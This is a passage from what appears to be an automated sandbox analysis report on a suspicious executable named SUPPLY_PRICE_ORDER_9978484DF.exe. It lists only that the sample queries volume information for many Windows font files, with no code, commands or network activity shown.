          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
